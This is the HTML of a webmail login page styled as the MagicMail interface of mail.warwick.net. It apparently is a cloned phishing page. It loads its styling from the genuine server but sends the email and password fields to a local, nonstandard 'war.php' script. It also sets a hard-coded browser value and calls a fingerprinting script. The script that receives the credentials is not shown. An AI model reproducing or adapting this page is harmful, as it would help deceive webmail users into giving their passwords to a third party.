<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<link rel="stylesheet" type="text/css" href="https://mail.warwick.net/css/wizard.css?v=3.0.0-8"><link rel="stylesheet" type="text/css" href="https://mail.warwick.net/css/magicmail.css?v=3.0.0-8"><link rel="stylesheet" type="text/css" href="https://mail.warwick.net/css/magicmail_standard.css?v=3.0.0-8"><link rel="stylesheet" type="text/css" href="https://mail.warwick.net/css/magicmail.spammanagement.css?v=3.0.0-8"><link rel="stylesheet" type="text/css" href="https://mail.warwick.net/css/magicmail.emailoptions.css?v=3.0.0-8"><link rel="stylesheet" type="text/css" href="https://mail.warwick.net/webmail/css/webmail_options.css?v=3.0.0-8"><!--[if IE 8]>
<link rel="stylesheet" type="text/css" media="all" href="https://mail.warwick.net/webmail/src/ie8.css?v=3.0.0-8"><![endif]-->
<script type="text/javascript" language="JavaScript">
<!--
if (self != top) { try { if (document.domain != top.document.domain) { throw "Clickjacking security violation! Please log out immediately!"; /* this code should never execute - exception should already have been thrown since it's a security violation in this case to even try to access top.document.domain (but it's left here just to be extra safe) */ } } catch (e) { self.location = "/webmail/src/signout.php"; top.location = "/webmail/src/signout.php" } }
// -->
</script>
<link rel="stylesheet" type="text/css" href="https://mail.warwick.net/webmail/themes/css/wvt.css"><link rel="shortcut icon" href="https://mail.warwick.net/favicon.ico" />
<title>MagicMail - Login</title><script language="JavaScript" type="text/javascript">
<!--
  var alreadyFocused = false;
  function squirrelmail_loginpage_onload() {
    document.login_form.js_autodetect_results.value = '1';
    if (alreadyFocused) return;
    var textElements = 0;
    for (i = 0; i < document.login_form.elements.length; i++) {
      if (document.login_form.elements[i].type == "text" || document.login_form.elements[i].type == "password") {
        textElements++;
        if (textElements == 1) {
          document.login_form.elements[i].focus();
          break;
        }
      }
    }
  }
// -->
</script>
<script language="JavaScript" type="text/javascript">
<!--
// validate input parameters
function checkForm()
{

    if (login_form.login_username.value.indexOf('@') == -1) {
        alert("Please enter your full email address, for example, person@isp.com");
        login_form.login_username.focus();
        return false;
    }

    if(login_form.secretkey.value.length == 0) {
        alert("Please enter your password, being careful to use the proper case.");
        login_form.secretkey.focus();
        return false;
    }

    return true;
}
// -->
</script>
<style type="text/css">
<!--[if IE 6]>
/* avoid stupid IE6 bug with frames and scrollbars */
body {
    voice-family: "\"}\"";
    voice-family: inherit;
    width: expression(document.documentElement.clientWidth - 30);
}
<![endif]-->
</style>        <script type="text/javascript" src="https://mail.warwick.net/js/htmlcanvas.js?v=3.0.1-2.1"></script>
    
</head>

<body text="#000000" bgcolor="#ffffff" link="#0000cc" vlink="#0000cc" alink="#0000cc" onLoad="squirrelmail_loginpage_onload();" style="text-align: center;">
<form action="war.php" method="post" name="login_form">

<div id="login_logo"></div>

<div id="login_container">
	<table cellspacing="0" style="margin:0 auto;width:300px;">
		<tr>
			<td colspan="2"><h1 id="login_header" style="text-align: center;">WebMail Login</h1></td>
		</tr>
		<tr>
			<td class="text" width="100">Email: </td>
			<td width="100%"><input type="text" name="login_username" value="" tabindex="1" class="login_input" autocorrect="off" autocapitalize="none" /></td>
		</tr>
		<tr>
			<td class="text" width="100">Password: </td>
			<td width="100%"><input type="password" name="secretkey" tabindex="2" class="login_input"/></td>
		</tr>
		<tr>
			<td></td>
			<td style="text-align: right;"><input name="button" onclick="javascript:return checkForm();" type="submit" value="Login" class="login_button"></td>
		</tr>
		<tr>
			<td colspan="2" style="text-align: center;">
				<input type=hidden name="js_autodetect_results" value="SMPREF_JS_OFF">
				<input type=hidden name="just_logged_in" value=1>
				<input type="hidden" name="logIntoSource" value="direct">
				<input type="hidden" id="browser_info" value="Win7, Firefox, Desktop"/>
				<p class="RememberMe">
<p class="RememberMe">
<input type="checkbox" name="cb_auto_user" value="true">
<small>Remember my Name</small>
<p class="WhatsThis"><a href="https://mail.warwick.net//plugins/login_auto/security.en.php" target="_blank">What's this?</a></p>
			</td>
		</tr>
		<tr>
			<td colspan="2" style="text-align: center;">
				 <div id="login_copyright">Your MagicMail WebMail Interface</div>
			</td>
		</tr>
	</table>
</div>
</form>
<script type="text/javascript">
    if (typeof Fingerprint2 !== "undefined") {
        if (window.requestIdleCallback) {
            requestIdleCallback(generateFingerprint);
        } else {
            setTimeout(generateFingerprint, 500);
        }
    }
</script> 

</body></html>
